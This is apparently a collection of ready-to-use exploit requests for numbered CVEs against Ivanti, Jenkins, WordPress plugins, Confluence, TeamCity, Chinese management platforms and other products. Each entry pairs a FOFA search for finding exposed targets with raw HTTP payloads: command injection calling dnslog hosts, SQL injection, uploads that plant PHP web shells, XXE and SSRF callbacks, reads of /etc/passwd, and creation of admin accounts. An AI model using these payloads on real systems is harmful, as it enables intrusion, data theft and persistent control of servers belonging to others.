User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.
126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
